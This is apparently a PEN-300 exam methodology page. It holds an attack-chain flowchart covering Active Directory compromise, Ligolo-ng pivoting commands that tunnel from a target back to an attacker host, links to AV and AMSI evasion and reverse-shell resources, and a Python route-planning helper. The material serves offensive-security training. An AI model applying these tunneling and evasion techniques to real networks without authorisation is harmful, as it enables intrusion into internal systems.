A high-level methodology I utilised when tackling the PEN-300 exam, and some enumeration and post-exploitation scripts I developed during the PEN-300 course and challenge labs.
```mermaid
flowchart TD
A[Reconnaissance] --> B[Initial Access]
B --> C[Privilege Escalation]
C --> D[Post Exploitation]
D --> E[Lateral Movement]
E --> C
E --> F[Forest Compromise]
F --> G[Secret Compromise]
%% Recursive machine compromise logic
D -->|Machine compromise enables adjacent initial access| B
E -->|Newly reachable system becomes new initial access| B
%% Recon
A1[DMZ Mapping - nmap TCP UDP] --> A
A2[Web Enumeration - ffuf vhosts] --> A
A3[SMB and FTP Enumeration] --> A
A4[Identity Mapping - Kerberos NTLM SMB Signing] --> A
A5[Credential Flow Mapping - Web to DB App to Service] --> A
A6[Management Planes - Jump CI CD PKI] --> A
%% Initial Access
B1[Insecure File Upload] --> B
B2[SQLi and Logic Flaws] --> B
B3[Authentication Bypass] --> B
B4[Phishing] --> B
B5[AV Evasion and AppLocker Bypass] --> B
%% Priv Esc
C1[Windows PrivEsc - Tokens Services UAC] --> C
C2[Linux PrivEsc - GTFOBins sudo systemd] --> C
%% Post Exploitation
D1[Credential Harvesting - History Keys DPAPI] --> D
D2[Secretsdump ccaches Certificates] --> D
%% Lateral Movement
E1[Hash Spraying Justifiable Targets] --> E
E2[Kerberoasting and ASREPRoasting] --> E
E3[DACL Abuse] --> E
E4[Delegation Abuse] --> E
E5[BloodHound Analysis] --> E
%% Forest
F1[Trust Enumeration] --> F
F2[Golden Ticket Extra SIDs] --> F
F3[Foreign Group Abuse] --> F
%% Secrets
G1[Vault Access] --> G
G2[Jump Host Pivot] --> G
G3[PKI Abuse ESC1 to ESC8] --> G
```
Pivoting with Ligolo-ng (reference: https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740)

Start the Ligolo proxy server on Kali:

```sh
sudo ./linux-proxy-amd64 -selfcert -laddr 0.0.0.0:443
```

Start the Ligolo agent on the target:

```
.\agent.exe -connect 192.168.45.202:443 -ignore-cert -retry
```

Add a new Ligolo interface (accessible by the user Kaiber) on Kali:

```sh
sudo ip tuntap add mode tun ligolo
```

Set the interface to up:

```sh
sudo ip link set ligolo up
```

Add routes for the internal subnet to the routing table:

```sh
sudo ip route add 172.16.141.0/24 dev ligolo
```

To clean up the routing table (for example a stale route still pointing at the VPN interface):

```sh
sudo ip route del 192.168.212.0/24 dev tun0
```

In the Ligolo proxy server console, listeners forward a port on the agent back to Kali. For example, forwarding port 8888 on the agent (0.0.0.0 binds on every agent interface, so we don't care which address the internal host uses) to 127.0.0.1:80 on Kali means that when an internal machine connects to the pivot host on port 8888 to pull files from our Python web server, the connection is forwarded to our Kali box. The listener below does the same for port 445 (SMB), exposing it as port 4455 on the agent:

```
listener_add --addr 0.0.0.0:4455 --to 127.0.0.1:445 --tcp
```

Double pivot (a listener on the first agent relays the second agent's connection back to the proxy port, so the second agent is started with `-connect <first agent>:44443`):

```
listener_add --addr 0.0.0.0:44443 --to 0.0.0.0:443
```

Tunnel through the second interface (create `ligolo_two` with `ip tuntap` and bring it up the same way as `ligolo` first):

```
start --tun ligolo_two
```

Route the agent's own loopback through the tunnel (240.0.0.1 is the Ligolo-ng magic address for the agent's 127.0.0.1):

```sh
sudo ip route add 240.0.0.1/32 dev ligolo
```

Then scan it:
```sh
nmap 240.0.0.1 -sV
```

- PayloadsAllTheThings - If you're meant to exploit a web app, you'll find a methodology/payload here.
- OSEPlayground - My go to resource for ideas.
- TMUX Cheatsheet - Save time by utilising the OG, lightweight terminal multiplexer.
- Revshells.com - Quick Reverse Shell Generation.
- PowerShell Obfuscation Bible - Some of the best guidance on PowerShell Obfuscation I've found.
- PowerShell Obfuscator - Simple web application for obfuscating PowerShell to bypass Signature based detections.
- Obfuscated AMSI Bypass Generation - Dynamic payload generation to bypass AMSI.
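Returning to the Ligolo-ng routing steps above (adding the pivot subnet to the `ligolo` interface and deleting a stale `tun0` route before it swallows pivot traffic): the following is an added example, not a script from this repo, that parses `ip route show` output and emits the add/del commands as a dry run instead of executing them. `SAMPLE_ROUTES` is constructed output; the subnets, addresses and interface names are the ones used above.

```python
"""Dry-run planner for the Kali-side route changes used with Ligolo-ng."""
import ipaddress
import re

# Constructed sample of `ip route show` output: lab VPN on tun0, a ligolo tun
# already carrying the agent-loopback route, and a stale 192.168.212.0/24
# route left on tun0 from an earlier pivot.
SAMPLE_ROUTES = """\
default via 10.0.2.2 dev eth0 proto dhcp metric 100
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15
192.168.45.0/24 dev tun0 proto kernel scope link src 192.168.45.202
192.168.212.0/24 dev tun0 scope link
240.0.0.1 dev ligolo scope link
"""

ROUTE_RE = re.compile(r"^(?P<dst>default|\S+)\s.*?\bdev\s+(?P<dev>\S+)")

def parse_routes(text):
    """Return [(network, device)] from `ip route show` output."""
    routes = []
    for line in text.splitlines():
        m = ROUTE_RE.match(line.strip())
        if not m:
            continue
        dst = "0.0.0.0/0" if m["dst"] == "default" else m["dst"]
        routes.append((ipaddress.ip_network(dst, strict=False), m["dev"]))
    return routes

def plan_pivot_routes(route_text, subnets, dev="ligolo"):
    """Commands needed to reach each subnet via `dev`.

    A non-default route on another interface that overlaps a wanted subnet is
    deleted first (it would keep pulling pivot traffic down the wrong tunnel);
    a route already present on `dev` is not re-added.
    """
    existing = parse_routes(route_text)
    cmds = []
    for cidr in subnets:
        want = ipaddress.ip_network(cidr, strict=False)
        for net, d in existing:
            if net.prefixlen and d != dev and net.overlaps(want):
                cmds.append(f"sudo ip route del {net} dev {d}")
        if (want, dev) not in existing:
            cmds.append(f"sudo ip route add {want} dev {dev}")
    return cmds

def teardown_routes(route_text, dev="ligolo"):
    """Commands that remove every route currently pointing at `dev`."""
    return [f"sudo ip route del {net} dev {d}"
            for net, d in parse_routes(route_text) if d == dev]
```

Feed it the real output of `ip route show` and review the printed commands before running them; the default route is never touched.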